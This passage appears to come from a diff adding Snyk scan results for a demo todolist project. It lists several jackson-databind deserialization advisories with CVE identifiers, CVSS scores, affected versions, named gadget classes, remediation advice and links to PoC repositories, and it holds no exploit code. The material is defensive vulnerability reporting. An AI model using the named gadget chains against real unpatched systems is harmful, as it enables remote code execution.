has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35491" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:40:53.658144Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:40:13Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:57.453912Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "bu5yer" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2999", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-35728", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:43.478254Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", + "epssDetails": { + "percentile": "0.80006", + "probability": "0.00674", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35728" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-27T14:34:18.527699Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-27T14:05:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-27T17:34:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.852735Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.093517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36187" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T12:47:33.579319Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T12:44:41Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.970819Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.768509Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36184", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.169091Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36184" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:02:15.197495Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.700251Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.214306Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36186" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:05:16.831143Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.206083Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.695573Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "title": "Deserialization of Untrusted 